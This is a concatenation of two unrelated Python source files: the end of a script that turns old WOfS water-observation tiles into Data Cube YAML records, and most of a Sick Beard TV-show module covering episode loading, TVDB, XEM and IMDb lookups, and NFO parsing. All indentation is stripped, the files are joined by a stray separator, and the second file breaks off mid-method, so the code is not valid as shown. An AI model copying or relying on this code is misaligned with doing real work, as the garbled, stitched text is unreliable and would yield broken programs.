left, right = x, x + dx * len(image['longitude'])
bottom, top = y + dy * len(image['latitude']), y
class CountableGenerator(object):
def __len__(self):
return len(times)
def __iter__(self):
for time in times:
sensing_time = netCDF4.num2date(time, units=times.units, calendar=times.calendar).isoformat()
yield {
'id': str(uuid.uuid4()),
'product_type': 'old_wofs',
'creation_dt': parse(image.date_created).isoformat(),
'platform': {'code': 'LANDSAT'},
'extent': {
'coord': {
'ul': {'lon': left, 'lat': top},
'ur': {'lon': right, 'lat': top},
'll': {'lon': left, 'lat': bottom},
'lr': {'lon': right, 'lat': bottom},
},
'from_dt': sensing_time,
'to_dt': sensing_time,
'center_dt': sensing_time
},
'format': {'name': 'NETCDF'},
'grid_spatial': {
'projection': {
'spatial_reference': projection,
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
},
# 'valid_data'
}
},
'image': {
'bands': {
'water': {
'path': str(Path(nc_file).absolute()),
'layer': 'Data',
}
}
},
'lineage': {'source_datasets': {}},
}
return CountableGenerator()
def prepare_datasets_geotiff(geotiff_file):
with rasterio.open(geotiff_file) as image:
file_path = Path(geotiff_file)
projection = image.crs['init']
left, bottom, right, top = image.bounds
# Calc sensing time
sensing_time = datetime(*[int(d)
for d in re.split(r'[-T]',
re.findall(r'\d\d\d\d-[\d\-T]+', geotiff_file)[0])])
creation_time = datetime.fromtimestamp(file_path.stat().st_ctime)
return {
'id': str(uuid.uuid4()),
'product_type': 'old_wofs',
'creation_dt': creation_time,
'platform': {'code': 'LANDSAT'},
'extent': {
'coord': {
'ul': {'lon': left, 'lat': top},
'ur': {'lon': right, 'lat': top},
'll': {'lon': left, 'lat': bottom},
'lr': {'lon': right, 'lat': bottom},
},
'from_dt': sensing_time,
'to_dt': sensing_time,
'center_dt': sensing_time
},
'format': {'name': str(image.driver)},
'grid_spatial': {
'projection': {
'spatial_reference': projection,
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
},
# 'valid_data'
}
},
'image': {
'bands': {
'water': {
'path': str(file_path.absolute()),
'layer': '1',
}
}
},
'lineage': {'source_datasets': {}},
}
@click.command(help="Prepare old WOfS tiles for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True),
nargs=-1)
@click.option('--output', help="Write datasets into this file",
type=click.Path(exists=False, writable=True))
def main(datasets, output):
with open(output, 'w') as stream:
with ProcessPoolExecutor(max_workers=4) as executor:
output_datasets = executor.map(prepare_datasets_geotiff, datasets)
# output_datasets = (executor.submit(prepare_datasets_geotiff, dataset)
# for dataset in datasets)
with click.progressbar(output_datasets,
length=len(datasets),
label='Loading datasets') as progress_bar_datasets:
yaml.dump_all(progress_bar_datasets, stream, Dumper=CDumper)
if __name__ == "__main__":
main()
|
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os.path
import datetime
import threading
import re
import glob
try:
import json
except ImportError:
from lib import simplejson as json
import urllib2, httplib
import traceback
import hashlib
from sickbeard import common
import sickbeard
import xml.etree.cElementTree as etree
from name_parser.parser import NameParser, InvalidNameException
from frenchFinder import FrenchFinder
from lib import subliminal
from lib.tidysub import cleaner
from lib.tvdb_api import tvdb_api, tvdb_exceptions
from lib.imdb import imdb
from sickbeard import db
from sickbeard import helpers, exceptions, logger
from sickbeard.exceptions import ex
from sickbeard import tvrage
from sickbeard import image_cache
from sickbeard import notifiers
from sickbeard import postProcessor
from sickbeard import subtitles
from sickbeard import history
from sickbeard import encodingKludge as ek
from common import Quality, Overview
from common import DOWNLOADED, SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH, ARCHIVED, IGNORED, UNAIRED, WANTED, SKIPPED, UNKNOWN
from common import NAMING_DUPLICATE, NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_SEPARATED_REPEAT, NAMING_LIMITED_EXTEND_E_PREFIXED
class TVShow(object):
def __init__ (self, tvdbid, lang="", audio_lang=""):
self.tvdbid = tvdbid
self._location = ""
self.name = ""
self.tvrid = 0
self.tvrname = ""
self.imdbid = ""
self.network = ""
self.genre = ""
self.runtime = 0
self.imdb_info = {}
self.quality = int(sickbeard.QUALITY_DEFAULT)
self.flatten_folders = int(sickbeard.FLATTEN_FOLDERS_DEFAULT)
self.status = ""
self.airs = ""
self.startyear = 0
self.paused = 0
self.frenchsearch = 0
self.air_by_date = 0
self.subtitles = int(sickbeard.SUBTITLES_DEFAULT if sickbeard.SUBTITLES_DEFAULT else 0)
self.lang = lang
self.audio_lang = audio_lang
self.lock = threading.Lock()
self._isDirGood = False
self.episodes = {}
otherShow = helpers.findCertainShow(sickbeard.showList, self.tvdbid)
if otherShow != None:
raise exceptions.MultipleShowObjectsException("Can't create a show if it already exists")
self.loadFromDB()
self.saveToDB()
def _getLocation(self):
# no dir check needed if missing show dirs are created during post-processing
if sickbeard.CREATE_MISSING_SHOW_DIRS:
return self._location
if ek.ek(os.path.isdir, self._location):
return self._location
else:
raise exceptions.ShowDirNotFoundException("Show folder doesn't exist, you shouldn't be using it")
if self._isDirGood:
return self._location
else:
raise exceptions.NoNFOException("Show folder doesn't exist, you shouldn't be using it")
def _setLocation(self, newLocation):
logger.log(u"Setter sets location to " + newLocation, logger.DEBUG)
# Don't validate dir if user wants to add shows without creating a dir
if sickbeard.ADD_SHOWS_WO_DIR or ek.ek(os.path.isdir, newLocation):
self._location = newLocation
self._isDirGood = True
else:
raise exceptions.NoNFOException("Invalid folder for the show!")
location = property(_getLocation, _setLocation)
# delete references to anything that's not in the internal lists
def flushEpisodes(self):
for curSeason in self.episodes:
for curEp in self.episodes[curSeason]:
myEp = self.episodes[curSeason][curEp]
self.episodes[curSeason][curEp] = None
del myEp
def hasSnatchedEpisodes(self):
myDB = db.DBConnection()
sql_selection = "SELECT COUNT(*) FROM tv_episodes where showid = " + str(self.tvdbid) + " AND (status % 100) IN (" + str(SNATCHED) + "," + str(SNATCHED_PROPER) + "," + str(SNATCHED_FRENCH) + ")"
count = myDB.select(sql_selection)
return (count[0][0] > 0)
def getAllEpisodes(self, season=None, has_location=False):
myDB = db.DBConnection()
sql_selection = "SELECT season, episode, "
# subselection to detect multi-episodes early, share_location > 0
sql_selection = sql_selection + " (SELECT COUNT (*) FROM tv_episodes WHERE showid = tve.showid AND season = tve.season AND location != '' AND location = tve.location AND episode != tve.episode) AS share_location "
sql_selection = sql_selection + " FROM tv_episodes tve WHERE showid = " + str(self.tvdbid)
if season is not None:
sql_selection = sql_selection + " AND season = " + str(season)
if has_location:
sql_selection = sql_selection + " AND location != '' "
# need ORDER episode ASC to rename multi-episodes in order S01E01-02
sql_selection = sql_selection + " ORDER BY season ASC, episode ASC"
results = myDB.select(sql_selection)
ep_list = []
for cur_result in results:
cur_ep = self.getEpisode(int(cur_result["season"]), int(cur_result["episode"]))
if cur_ep:
if cur_ep.location:
# if there is a location, check if it's a multi-episode (share_location > 0) and put them in relatedEps
if cur_result["share_location"] > 0:
related_eps_result = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND location = ? AND episode != ? ORDER BY episode ASC", [self.tvdbid, cur_ep.season, cur_ep.location, cur_ep.episode])
for cur_related_ep in related_eps_result:
related_ep = self.getEpisode(int(cur_related_ep["season"]), int(cur_related_ep["episode"]))
if related_ep not in cur_ep.relatedEps:
cur_ep.relatedEps.append(related_ep)
ep_list.append(cur_ep)
return ep_list
def getEpisode(self, season, episode, file=None, noCreate=False, scene=False):
#return TVEpisode(self, season, episode)
def createCurSeasonDict():
if not season in self.episodes:
self.episodes[season] = {}
createCurSeasonDict()
ep = None
if (not episode in self.episodes[season] or self.episodes[season][episode] == None) or scene:
if noCreate:
return None
logger.log(str(self.tvdbid) + ": An object for episode " + str(season) + "x" + str(episode) + " didn't exist in the cache, trying to create it", logger.DEBUG)
if file != None:
ep = TVEpisode(self, season, episode, file, scene)
else:
ep = TVEpisode(self, season, episode, scene=scene)
if ep != None:
if scene: # if scene mode was active we need to use the new ep season episode numbers
season = ep.season
episode = ep.episode
createCurSeasonDict() # recheck current "real" season dict
self.episodes[season][episode] = ep
return self.episodes[season][episode]
def writeShowNFO(self):
result = False
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + u": Show dir doesn't exist, skipping NFO generation")
return False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_show_metadata(self) or result
return result
def writeMetadata(self, show_only=False):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + u": Show dir doesn't exist, skipping NFO generation")
return
self.getImages()
self.writeShowNFO()
if not show_only:
self.writeEpisodeNFOs()
def writeEpisodeNFOs (self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, skipping NFO generation")
return
logger.log(str(self.tvdbid) + ": Writing NFOs for all episodes")
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.tvdbid])
for epResult in sqlResults:
logger.log(str(self.tvdbid) + ": Retrieving/creating episode " + str(epResult["season"]) + "x" + str(epResult["episode"]), logger.DEBUG)
curEp = self.getEpisode(epResult["season"], epResult["episode"])
curEp.createMetaFiles()
# find all media files in the show folder and create episodes for as many as possible
def loadEpisodesFromDir (self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, not loading episodes from disk")
return
logger.log(str(self.tvdbid) + ": Loading all episodes from the show directory " + self._location)
# get file list
mediaFiles = helpers.listMediaFiles(self._location)
# create TVEpisodes from each media file (if possible)
for mediaFile in mediaFiles:
curEpisode = None
logger.log(str(self.tvdbid) + ": Creating episode from " + mediaFile, logger.DEBUG)
try:
curEpisode = self.makeEpFromFile(ek.ek(os.path.join, self._location, mediaFile))
except (exceptions.ShowNotFoundException, exceptions.EpisodeNotFoundException), e:
logger.log(u"Episode "+mediaFile+" returned an exception: "+ex(e), logger.ERROR)
continue
except exceptions.EpisodeDeletedException:
logger.log(u"The episode deleted itself when I tried making an object for it", logger.DEBUG)
if curEpisode is None:
continue
# see if we should save the release name in the db
ep_file_name = ek.ek(os.path.basename, curEpisode.location)
ep_file_name = ek.ek(os.path.splitext, ep_file_name)[0]
parse_result = None
try:
np = NameParser(False)
parse_result = np.parse(ep_file_name)
except InvalidNameException:
pass
if not ' ' in ep_file_name and parse_result and parse_result.release_group:
logger.log(u"Name " + ep_file_name + " gave release group of " + parse_result.release_group + ", seems valid", logger.DEBUG)
curEpisode.release_name = ep_file_name
# store the reference in the show
if curEpisode != None:
if self.subtitles:
try:
curEpisode.refreshSubtitles()
except:
logger.log(str(self.tvdbid) + ": Could not refresh subtitles", logger.ERROR)
logger.log(traceback.format_exc(), logger.DEBUG)
curEpisode.saveToDB()
def loadEpisodesFromDB(self):
logger.log(u"Loading all episodes from the DB")
myDB = db.DBConnection()
sql = "SELECT * FROM tv_episodes WHERE showid = ?"
sqlResults = myDB.select(sql, [self.tvdbid])
scannedEps = {}
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
cachedShow = t[self.tvdbid]
cachedSeasons = {}
for curResult in sqlResults:
deleteEp = False
curSeason = int(curResult["season"])
curEpisode = int(curResult["episode"])
if curSeason not in cachedSeasons:
try:
cachedSeasons[curSeason] = cachedShow[curSeason]
except tvdb_exceptions.tvdb_seasonnotfound, e:
logger.log(u"Error when trying to load the episode from TVDB: "+e.message, logger.WARNING)
deleteEp = True
if not curSeason in scannedEps:
scannedEps[curSeason] = {}
logger.log(u"Loading episode "+str(curSeason)+"x"+str(curEpisode)+" from the DB", logger.DEBUG)
try:
curEp = self.getEpisode(curSeason, curEpisode)
# if we found out that the ep is no longer on TVDB then delete it from our database too
if deleteEp:
curEp.deleteEpisode()
curEp.loadFromDB(curSeason, curEpisode)
curEp.loadFromTVDB(tvapi=t, cachedSeason=cachedSeasons[curSeason])
scannedEps[curSeason][curEpisode] = True
except exceptions.EpisodeDeletedException:
logger.log(u"Tried loading an episode from the DB that should have been deleted, skipping it", logger.DEBUG)
continue
return scannedEps
def loadEpisodesFromTVDB(self, cache=True):
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if self.lang:
ltvdb_api_parms['language'] = self.lang
try:
t = tvdb_api.Tvdb(**ltvdb_api_parms)
showObj = t[self.tvdbid]
except tvdb_exceptions.tvdb_error:
logger.log(u"TVDB timed out, unable to update episodes from TVDB", logger.ERROR)
return None
logger.log(str(self.tvdbid) + ": Loading all episodes from theTVDB...")
scannedEps = {}
for season in showObj:
scannedEps[season] = {}
for episode in showObj[season]:
# need some examples of wtf episode 0 means to decide if we want it or not
if episode == 0:
continue
try:
#ep = TVEpisode(self, season, episode)
ep = self.getEpisode(season, episode)
except exceptions.EpisodeNotFoundException:
logger.log(str(self.tvdbid) + ": TVDB object for " + str(season) + "x" + str(episode) + " is incomplete, skipping this episode")
continue
else:
try:
ep.loadFromTVDB(tvapi=t)
except exceptions.EpisodeDeletedException:
logger.log(u"The episode was deleted, skipping the rest of the load")
continue
with ep.lock:
logger.log(str(self.tvdbid) + ": Loading info from theTVDB for episode " + str(season) + "x" + str(episode), logger.DEBUG)
ep.loadFromTVDB(season, episode, tvapi=t)
if ep.dirty:
ep.saveToDB()
scannedEps[season][episode] = True
return scannedEps
def loadEpisodeSceneNumbers(self):
url = "http://thexem.de/map/all?id=%s&origin=tvdb&destination=scene" % self.tvdbid
logger.log("xem url: " + url, logger.DEBUG)
opener = urllib2.build_opener()
try:
f = opener.open(url)
except (EOFError, IOError), e:
logger.log(u"Unable to connect to XEM. Is thexem.de down ?" + ex(e), logger.ERROR)
return False
except httplib.InvalidURL, e:
logger.log(u"Invalid XEM host. Is thexem.de down ?: " + ex(e), logger.ERROR)
return False
if not f:
logger.log(u"Empty response from " + url + ": " + ex(e), logger.ERROR)
return False
try:
xemJson = json.loads(f.read())
except ValueError, e:
pass
epList = self.loadEpisodesFromDB()
for curSeason in epList:
for curEp in epList[curSeason]:
epObj = self.getEpisode(curSeason, curEp)
epObj.scene_season = None
epObj.scene_episode = None
epObj.saveToDB()
if xemJson['result'] == 'failure':
return False
for epNumbers in xemJson['data']:
tvdb = epNumbers['tvdb']
scene = epNumbers['scene']
if not tvdb['season'] in epList or not tvdb['episode'] in epList[tvdb['season']]:
logger.log(str(self.tvdbid) + ": NOT adding scene number. tvdb: " + str(tvdb) + "| scene: " + str(scene) + " we dont have a ep with this (tvdb) sxxexx", logger.WARNING)
logger.log(str(self.tvdbid) + ": adding scene number. tvdb: " + str(tvdb) + "| scene: " + str(scene), logger.DEBUG)
curEp = self.getEpisode(tvdb['season'], tvdb['episode'])
curEp.scene_season = scene['season']
curEp.scene_episode = scene['episode']
curEp.saveToDB()
return True
def setTVRID(self, force=False):
if self.tvrid != 0 and not force:
logger.log(u"No need to get the TVRage ID, it's already populated", logger.DEBUG)
return
logger.log(u"Attempting to retrieve the TVRage ID", logger.DEBUG)
try:
# load the tvrage object, it will set the ID in its constructor if possible
tvrage.TVRage(self)
self.saveToDB()
except exceptions.TVRageException, e:
logger.log(u"Couldn't get TVRage ID because we're unable to sync TVDB and TVRage: "+ex(e), logger.DEBUG)
return
def getImages(self, fanart=None, poster=None):
poster_result = fanart_result = season_thumb_result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
logger.log("Running season folders for "+cur_provider.name, logger.DEBUG)
poster_result = cur_provider.create_poster(self) or poster_result
fanart_result = cur_provider.create_fanart(self) or fanart_result
season_thumb_result = cur_provider.create_season_thumbs(self) or season_thumb_result
return poster_result or fanart_result or season_thumb_result
def loadLatestFromTVRage(self):
try:
# load the tvrage object
tvr = tvrage.TVRage(self)
newEp = tvr.findLatestEp()
if newEp != None:
logger.log(u"TVRage gave us an episode object - saving it for now", logger.DEBUG)
newEp.saveToDB()
# make an episode out of it
except exceptions.TVRageException, e:
logger.log(u"Unable to add TVRage info: " + ex(e), logger.WARNING)
# make a TVEpisode object from a media file
def makeEpFromFile(self, file):
if not ek.ek(os.path.isfile, file):
logger.log(str(self.tvdbid) + ": That isn't even a real file dude... " + file)
return None
logger.log(str(self.tvdbid) + ": Creating episode object from " + file, logger.DEBUG)
try:
myParser = NameParser()
parse_result = myParser.parse(file)
except InvalidNameException:
logger.log(u"Unable to parse the filename "+file+" into a valid episode", logger.ERROR)
return None
if len(parse_result.episode_numbers) == 0 and not parse_result.air_by_date:
logger.log("parse_result: "+str(parse_result))
logger.log(u"No episode number found in "+file+", ignoring it", logger.DEBUG)
return None
# for now lets assume that any episode in the show dir belongs to that show
season = parse_result.season_number if parse_result.season_number != None else 1
episodes = parse_result.episode_numbers
rootEp = None
# if we have an air-by-date show then get the real season/episode numbers
if parse_result.air_by_date:
try:
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
epObj = t[self.tvdbid].airedOn(parse_result.air_date)[0]
season = int(epObj["seasonnumber"])
episodes = [int(epObj["episodenumber"])]
except tvdb_exceptions.tvdb_episodenotfound:
logger.log(u"Unable to find episode with date " + str(parse_result.air_date) + " for show " + self.name + ", skipping", logger.WARNING)
return None
except tvdb_exceptions.tvdb_error, e:
logger.log(u"Unable to contact TVDB: "+ex(e), logger.WARNING)
return None
for curEpNum in episodes:
episode = int(curEpNum)
logger.log(str(self.tvdbid) + ": " + file + " parsed to " + self.name + " " + str(season) + "x" + str(episode), logger.DEBUG)
checkQualityAgain = False
same_file = False
curEp = self.getEpisode(season, episode)
if curEp == None:
try:
curEp = self.getEpisode(season, episode, file)
except exceptions.EpisodeNotFoundException:
logger.log(str(self.tvdbid) + ": Unable to figure out what this file is, skipping", logger.ERROR)
continue
else:
# if there is a new file associated with this ep then re-check the quality
if curEp.location and ek.ek(os.path.normpath, curEp.location) != ek.ek(os.path.normpath, file):
logger.log(u"The old episode had a different file associated with it, I will re-check the quality based on the new filename "+file, logger.DEBUG)
checkQualityAgain = True
with curEp.lock:
old_size = curEp.file_size
curEp.location = file
# if the sizes are the same then it's probably the same file
if old_size and curEp.file_size == old_size:
same_file = True
else:
same_file = False
curEp.checkForMetaFiles()
if rootEp == None:
rootEp = curEp
else:
if curEp not in rootEp.relatedEps:
rootEp.relatedEps.append(curEp)
# if it's a new file then
if not same_file:
curEp.release_name = ''
# if they replace a file on me I'll make some attempt at re-checking the quality unless I know it's the same file
if checkQualityAgain and not same_file:
newQuality = Quality.nameQuality(file)
logger.log(u"Since this file has been renamed, I checked "+file+" and found quality "+Quality.qualityStrings[newQuality], logger.DEBUG)
if newQuality != Quality.UNKNOWN:
curEp.status = Quality.compositeStatus(DOWNLOADED, newQuality)
# check for status/quality changes as long as it's a new file
elif not same_file and sickbeard.helpers.isMediaFile(file) and curEp.status not in Quality.DOWNLOADED + [ARCHIVED, IGNORED]:
oldStatus, oldQuality = Quality.splitCompositeStatus(curEp.status)
newQuality = Quality.nameQuality(file)
if newQuality == Quality.UNKNOWN:
newQuality = Quality.assumeQuality(file)
newStatus = None
# if it was snatched and now exists then set the status correctly
if oldStatus == SNATCHED and oldQuality <= newQuality:
logger.log(u"STATUS: this ep used to be snatched with quality "+Quality.qualityStrings[oldQuality]+" but a file exists with quality "+Quality.qualityStrings[newQuality]+" so I'm setting the status to DOWNLOADED", logger.DEBUG)
newStatus = DOWNLOADED
# if it was snatched proper and we found a higher quality one then allow the status change
elif (oldStatus == SNATCHED_PROPER or oldStatus == SNATCHED_FRENCH) and oldQuality < newQuality:
logger.log(u"STATUS: this ep used to be snatched proper with quality "+Quality.qualityStrings[oldQuality]+" but a file exists with quality "+Quality.qualityStrings[newQuality]+" so I'm setting the status to DOWNLOADED", logger.DEBUG)
newStatus = DOWNLOADED
elif oldStatus not in (SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH):
newStatus = DOWNLOADED
if newStatus != None:
with curEp.lock:
logger.log(u"STATUS: we have an associated file, so setting the status from "+str(curEp.status)+" to DOWNLOADED/" + str(Quality.statusFromName(file)), logger.DEBUG)
curEp.status = Quality.compositeStatus(newStatus, newQuality)
history.logDownload(curEp, file, newQuality, parse_result.release_group)
with curEp.lock:
curEp.saveToDB()
# creating metafiles on the root should be good enough
if rootEp != None:
with rootEp.lock:
rootEp.createMetaFiles()
return rootEp
def loadFromDB(self, skipNFO=False):
logger.log(str(self.tvdbid) + ": Loading show info from database")
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_shows WHERE tvdb_id = ?", [self.tvdbid])
if len(sqlResults) > 1:
raise exceptions.MultipleDBShowsException()
elif len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": Unable to find the show in the database")
return
else:
if self.name == "":
self.name = sqlResults[0]["show_name"]
self.tvrname = sqlResults[0]["tvr_name"]
if self.network == "":
self.network = sqlResults[0]["network"]
if self.genre == "":
self.genre = sqlResults[0]["genre"]
self.runtime = sqlResults[0]["runtime"]
self.status = sqlResults[0]["status"]
if self.status == None:
self.status = ""
self.airs = sqlResults[0]["airs"]
if self.airs == None:
self.airs = ""
self.startyear = sqlResults[0]["startyear"]
if self.startyear == None:
self.startyear = 0
self.air_by_date = sqlResults[0]["air_by_date"]
if self.air_by_date == None:
self.air_by_date = 0
self.subtitles = sqlResults[0]["subtitles"]
if self.subtitles:
self.subtitles = 1
else:
self.subtitles = 0
self.quality = int(sqlResults[0]["quality"])
self.flatten_folders = int(sqlResults[0]["flatten_folders"])
self.paused = int(sqlResults[0]["paused"])
self.frenchsearch = int(sqlResults[0]["frenchsearch"])
self._location = sqlResults[0]["location"]
if self.tvrid == 0:
self.tvrid = int(sqlResults[0]["tvr_id"])
if self.lang == "":
self.lang = sqlResults[0]["lang"]
if self.audio_lang == "":
self.audio_lang = sqlResults[0]["audio_lang"]
if self.imdbid == "":
self.imdbid = sqlResults[0]["imdb_id"]
#Get IMDb_info from database
sqlResults = myDB.select("SELECT * FROM imdb_info WHERE tvdb_id = ?", [self.tvdbid])
if len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": Unable to find IMDb show info in the database")
return
else:
self.imdb_info = dict(zip(sqlResults[0].keys(), sqlResults[0]))
def loadFromTVDB(self, cache=True, tvapi=None, cachedSeason=None):
logger.log(str(self.tvdbid) + ": Loading show info from theTVDB")
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
if tvapi is None:
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
else:
t = tvapi
myEp = t[self.tvdbid]
self.name = myEp["seriesname"]
self.genre = myEp['genre']
self.network = myEp['network']
self.runtime = myEp['runtime']
self.imdbid = myEp['imdb_id']
if myEp["airs_dayofweek"] != None and myEp["airs_time"] != None:
self.airs = myEp["airs_dayofweek"] + " " + myEp["airs_time"]
if myEp["firstaired"] != None and myEp["firstaired"]:
self.startyear = int(myEp["firstaired"].split('-')[0])
if self.airs == None:
self.airs = ""
if myEp["status"] != None:
self.status = myEp["status"]
if self.status == None:
self.status = ""
# self.saveToDB()
def loadIMDbInfo(self, imdbapi=None):
imdb_info = {'imdb_id' : self.imdbid,
'title' : '',
'year' : '',
'akas' : [],
'runtimes' : '',
'genres' : [],
'countries' : '',
'country codes' : '',
'certificates' : [],
'rating' : '',
'votes': '',
'last_update': ''
}
if self.imdbid:
logger.log(str(self.tvdbid) + ": Loading show info from IMDb")
i = imdb.IMDb()
imdbTv = i.get_movie(str(self.imdbid[2:]))
for key in filter(lambda x: x in imdbTv.keys(), imdb_info.keys()):
# Store only the first value for string type
if type(imdb_info[key]) == type('') and type(imdbTv.get(key)) == type([]):
imdb_info[key] = imdbTv.get(key)[0]
else:
imdb_info[key] = imdbTv.get(key)
#Filter only the value
if imdb_info['runtimes']:
imdb_info['runtimes'] = re.search('\d+',imdb_info['runtimes']).group(0)
else:
imdb_info['runtimes'] = self.runtime
if imdb_info['akas']:
imdb_info['akas'] = '|'.join(imdb_info['akas'])
else:
imdb_info['akas'] = ''
#Join all genres in a string
if imdb_info['genres']:
imdb_info['genres'] = '|'.join(imdb_info['genres'])
else:
imdb_info['genres'] = ''
#Get only the production country certificate if any
if imdb_info['certificates'] and imdb_info['countries']:
dct = {}
try:
for item in imdb_info['certificates']:
dct[item.split(':')[0]] = item.split(':')[1]
imdb_info['certificates'] = dct[imdb_info['countries']]
except:
imdb_info['certificates'] = ''
else:
imdb_info['certificates'] = ''
imdb_info['last_update'] = datetime.date.today().toordinal()
#Rename dict keys without spaces for DB upsert
self.imdb_info = dict((k.replace(' ', '_'),f(v) if hasattr(v,'keys') else v) for k,v in imdb_info.items())
logger.log(str(self.tvdbid) + ": Obtained info from IMDb ->" + str(self.imdb_info), logger.DEBUG)
def loadNFO (self):
if not os.path.isdir(self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't load NFO")
raise exceptions.NoNFOException("The show dir doesn't exist, no NFO could be loaded")
logger.log(str(self.tvdbid) + ": Loading show info from NFO")
xmlFile = os.path.join(self._location, "tvshow.nfo")
try:
xmlFileObj = open(xmlFile, 'r')
showXML = etree.ElementTree(file = xmlFileObj)
if showXML.findtext('title') == None or (showXML.findtext('tvdbid') == None and showXML.findtext('id') == None):
raise exceptions.NoNFOException("Invalid info in tvshow.nfo (missing name or id):" \
+ str(showXML.findtext('title')) + " " \
+ str(showXML.findtext('tvdbid')) + " " \
+ str(showXML.findtext('id')))
self.name = showXML.findtext('title')
if showXML.findtext('tvdbid') != None:
self.tvdbid = int(showXML.findtext('tvdbid'))
elif showXML.findtext('id'):
self.tvdbid = int(showXML.findtext('id'))
else:
raise exceptions.NoNFOException("Empty <id> or <tvdbid> field in NFO")
except (exceptions.NoNFOException, SyntaxError, ValueError), e:
logger.log(u"There was an error parsing your existing tvshow.nfo file: " + ex(e), logger.ERROR)
logger.log(u"Attempting to rename it to tvshow.nfo.old", logger.DEBUG)
try:
xmlFileObj.close()
ek.ek(os.rename, xmlFile, xmlFile + ".old")
except Exception, e:
logger.log(u"Failed to rename your tvshow.nfo file - you need to delete it or fix it: " + ex(e), logger.ERROR)
raise exceptions.NoNFOException("Invalid info in tvshow.nfo")
if showXML.findtext('studio') != None:
self.network = showXML.findtext('studio')
if self.network == None and showXML.findtext('network') != None:
self.network = ""
if showXML.findtext('genre') != None:
self.genre = showXML.findtext('genre')
else:
self.genre = ""
# TODO: need to validate the input, I'm assuming it's good until then
def nextEpisode(self):
logger.log(str(self.tvdbid) + ": Finding the episode which airs next", logger.DEBUG)
myDB = db.DBConnection()
innerQuery = "SELECT airdate FROM tv_episodes WHERE showid = ? AND airdate >= ? AND status = ? ORDER BY airdate ASC LIMIT 1"
innerParams = [self.tvdbid, datetime.date.today().toordinal(), UNAIRED]
query = "SELECT * FROM tv_episodes WHERE showid = ? AND airdate >= ? AND airdate <= (" + innerQuery + ") and status = ?"
params = [self.tvdbid, datetime.date.today().toordinal()] + innerParams + [UNAIRED]
sqlResults = myDB.select(query, params)
if sqlResults == None or len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": No episode found... need to implement tvrage and also show status", logger.DEBUG)
return []
else:
logger.log(str(self.tvdbid) + ": Found episode " + str(sqlResults[0]["season"]) + "x" + str(sqlResults[0]["episode"]), logger.DEBUG)
foundEps = []
for sqlEp in sqlResults:
curEp = self.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
foundEps.append(curEp)
return foundEps
# if we didn't get an episode then try getting one from tvrage
# load tvrage info
# extract NextEpisode info
# verify that we don't have it in the DB somehow (ep mismatch)
def deleteShow(self):
myDB = db.DBConnection()
myDB.action("DELETE FROM tv_episodes WHERE showid = ?", [self.tvdbid])
myDB.action("DELETE FROM tv_shows WHERE tvdb_id = ?", [self.tvdbid])
myDB.action("DELETE FROM imdb_info WHERE tvdb_id = ?", [self.tvdbid])
# remove self from show list
sickbeard.showList = [x for x in sickbeard.showList if x.tvdbid != self.tvdbid]
# clear the cache
image_cache_dir = ek.ek(os.path.join, sickbeard.CACHE_DIR, 'images')
for cache_file in ek.ek(glob.glob, ek.ek(os.path.join, image_cache_dir, str(self.tvdbid)+'.*')):
logger.log(u"Deleting cache file "+cache_file)
os.remove(cache_file)
def populateCache(self):
cache_inst = image_cache.ImageCache()
logger.log(u"Checking & filling cache for show "+self.name)
cache_inst.fill_cache(self)
def refreshDir(self):
# make sure the show dir is where we think it is unless dirs are created on the fly
if not ek.ek(os.path.isdir, self._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS:
return False
# load from dir
self.loadEpisodesFromDir()
# run through all locations from DB, check that they exist
logger.log(str(self.tvdbid) + ": Loading all episodes with a location from the database")
myDB = db.DBConnection()
